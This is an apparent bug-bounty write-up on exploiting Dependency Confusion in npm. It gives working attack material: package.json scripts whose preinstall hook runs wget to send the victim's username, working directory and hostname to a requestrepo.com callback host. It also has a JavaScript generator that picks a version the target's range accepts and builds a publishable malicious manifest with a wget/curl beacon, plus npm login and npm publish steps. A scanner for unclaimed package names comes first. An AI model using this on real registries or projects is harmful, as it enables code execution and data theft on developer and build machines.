Dependency Confusion Unleashed: How One Misconfiguration Can Compromise an Entire System


omar gamal

Peace be upon you, and the mercy and blessings of God

Hello Hackers 😀

Today, Inshallah, I am going to show you how I found my first Dependency Confusion vulnerability.

Dependency Confusion is a vulnerability in which an attacker tricks a package manager into installing an attacker-controlled public package instead of the intended internal one. It occurs when a package manager such as npm or pip resolves a private package name against a public registry (npmjs.com, PyPI) rather than the organisation's private registry, typically because the client is configured to consult the public registry for every name, or because the public registry offers a higher version of the same name. Since package install hooks run automatically, the result is arbitrary code execution on every developer machine and build server that installs the dependency.

I was browsing the target website with Burp Suite actively monitoring traffic. Suddenly, a high-severity alert appeared in Burp’s Issues tab, flagging a potential Dependency Confusion vulnerability.

Intrigued, I decided to investigate further. Burp's notification suggested that the system might be vulnerable to Dependency Confusion attacks because the dependency was not found on the https://www.npmjs.com/ site, so I went to check for myself whether the dependency was registered there.

And indeed: 0 packages found.
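The registry check above can be automated. The script below is an added example and is not code from the original post: given a target's package.json it reports every dependency name the public npm registry does not know (HTTP 404), which is exactly the condition Burp flagged. The manifest and the registry answers embedded in it are constructed for the example; registryStatus() performs the live lookup when you have network access, and the package names used are assumptions.

```javascript
// Added example (not from the original post): find dependency names that are
// unclaimed on the public npm registry, the precondition for Dependency Confusion.

// Collect dependency names from every section npm installs from.
function dependencyNames(manifest) {
  const sections = ["dependencies", "devDependencies", "optionalDependencies", "peerDependencies"];
  const names = new Set();
  for (const section of sections) {
    for (const name of Object.keys(manifest[section] || {})) names.add(name);
  }
  return [...names];
}

// lookup(name) returns the registry's HTTP status for that name. It is injected so
// the classification can be exercised offline; 404 means the name is unclaimed.
function classifyDependencies(manifest, lookup) {
  const result = { unclaimed: [], claimed: [], errors: [] };
  for (const name of dependencyNames(manifest)) {
    const status = lookup(name);
    if (status === 404) result.unclaimed.push(name);
    else if (status === 200) result.claimed.push(name);
    else result.errors.push({ name, status }); // rate limit or outage: recheck later
  }
  return result;
}

// Live lookup (Node 18+ has a global fetch). A scoped name must be sent as
// "@scope%2Fname"; a 404 for a scoped package can also mean the whole scope is free.
async function registryStatus(name) {
  const response = await fetch("https://registry.npmjs.org/" + name.replace("/", "%2F"));
  return response.status;
}

// Constructed sample input: two public names and two internal-looking names.
const SAMPLE_MANIFEST = {
  name: "target-frontend",
  dependencies: { express: "^4.18.2", "acme-internal-auth": "^2.1.0" },
  devDependencies: { "acme-build-tools": "~1.4.2", jest: "^29.0.0" },
};

// Constructed registry answers standing in for registryStatus().
const FAKE_REGISTRY = { express: 200, jest: 200, "acme-internal-auth": 404, "acme-build-tools": 404 };
const fakeLookup = (name) => FAKE_REGISTRY[name] ?? 503;

const report = classifyDependencies(SAMPLE_MANIFEST, fakeLookup);
console.log("unclaimed (candidates):", report.unclaimed);
console.log("claimed on npmjs.com:", report.claimed);
```

Anything in the "unclaimed" list is only a candidate: it still has to be confirmed that the target's npm client actually consults the public registry for that name, which is what the callback package in the rest of the write-up tests.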

First, create the package with

npm init

giving it a higher version than the one the target uses, so that when the dependency is installed or updated, a badly configured package manager that also consults the public registry will pick the higher version from there.

For an npm package, the generated package.json file has a scripts property. Here we use its preinstall hook to pass a command that verifies whether remote code execution is possible. npm runs preinstall automatically during npm install, so the target's code never needs to import anything from the package; the hook does not fire, however, if the target installs with --ignore-scripts.

For this check, I used http://requestrepo.com/, a website for out-of-band data extraction. Then it is possible to enter a command that verifies code execution by exfiltrating data; in this case I used

"scripts": {
  "test": "wget --quiet \"http://5bk9u654.requestrepo.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" ",
  "preinstall": "wget --quiet \"http://5bk9u654.requestrepo.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" "
},

which reports the user, working directory and hostname of the machine running the install. The modified version looks like this:

It is necessary to create an account at https://www.npmjs.com/, and only after verifying the account by email is it possible to publish the package, as in the steps below:

1. After creating the account, log in using

npm login

which will open the npm site in your browser to complete the login.

2. Then publish the package using

npm publish

The output should look something like this:

When someone installs or updates the package, npm will fetch the highest version it can see, which is ours, and the preinstall command will run, sending a request like this:
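The whole procedure above (pick a version the target's range will accept, add the preinstall callback, write the manifest to publish) is collected in the following added example. It is not the author's code; the package name, the observed version range and the requestrepo host are assumptions, and the callback only reports user, working directory and hostname, as in the write-up. It goes slightly beyond the text by choosing the version from the range found in the target's package.json, since a very high version such as 99.99.99 does not satisfy a caret or tilde range and would never be selected.

```javascript
// Added example (not from the original post): generate the package.json for a
// dependency confusion proof of concept.

// Pick a version that the observed range accepts but that is higher than anything
// the internal registry is likely to hold, so a resolver that also consults the
// public registry prefers this package. Note: a lockfile (package-lock.json) pins
// the resolved version, so installs with "npm ci" are not affected by a new version.
function chooseVersion(spec) {
  const m = spec.match(/^(\^|~|>=|=)?\s*(\d+)\.(\d+)\.(\d+)$/);
  if (!m) return "99.99.99";                               // "*", "latest", "x" ranges: anything high wins
  const [, op, major, minor] = m;
  if (op === ">=") return "99.99.99";
  if (op === "^" && major !== "0") return `${major}.9999.0`; // ^1.4.2  => >=1.4.2 <2.0.0
  if (op === "^" && minor !== "0") return `0.${minor}.9999`; // ^0.4.2  => >=0.4.2 <0.5.0
  if (op === "~") return `${major}.${minor}.9999`;           // ~1.4.2  => >=1.4.2 <1.5.0
  return spec.replace(/^[=^~]/, "");                         // exact pin (or ^0.0.x): only that version matches
}

// The $(...) substitutions are expanded by the shell on the victim host when npm
// runs the lifecycle script, not here.
function callbackUrl(host) {
  return `http://${host}/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)`;
}

function buildPocManifest(name, observedSpec, callbackHost) {
  const url = callbackUrl(callbackHost);
  // wget as in the write-up, with a curl fallback for hosts that lack wget.
  const beacon = `wget --quiet "${url}" || curl --silent "${url}"`;
  return {
    name,
    version: chooseVersion(observedSpec),
    description: "dependency confusion proof of concept (authorised test only)",
    scripts: { preinstall: beacon },
    license: "ISC",
  };
}

function manifestJson(name, observedSpec, callbackHost) {
  return JSON.stringify(buildPocManifest(name, observedSpec, callbackHost), null, 2);
}

// Writes the manifest into dir; afterwards run "npm login" and "npm publish" there.
function writePocPackage(dir, name, observedSpec, callbackHost) {
  const fs = require("fs");
  const path = require("path");
  fs.mkdirSync(dir, { recursive: true });
  const file = path.join(dir, "package.json");
  fs.writeFileSync(file, manifestJson(name, observedSpec, callbackHost) + "\n");
  return file;
}

// Constructed values: an internal name found unclaimed on npmjs.com, the range the
// target declared for it, and an assumed requestrepo subdomain.
console.log(manifestJson("acme-internal-auth", "^2.1.0", "abcd1234.requestrepo.com"));
```

Publish only a package whose name you have confirmed is unclaimed and that belongs to a target you are authorised to test; the preinstall hook runs on every machine that resolves the name, including unrelated users who happen to typo it.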
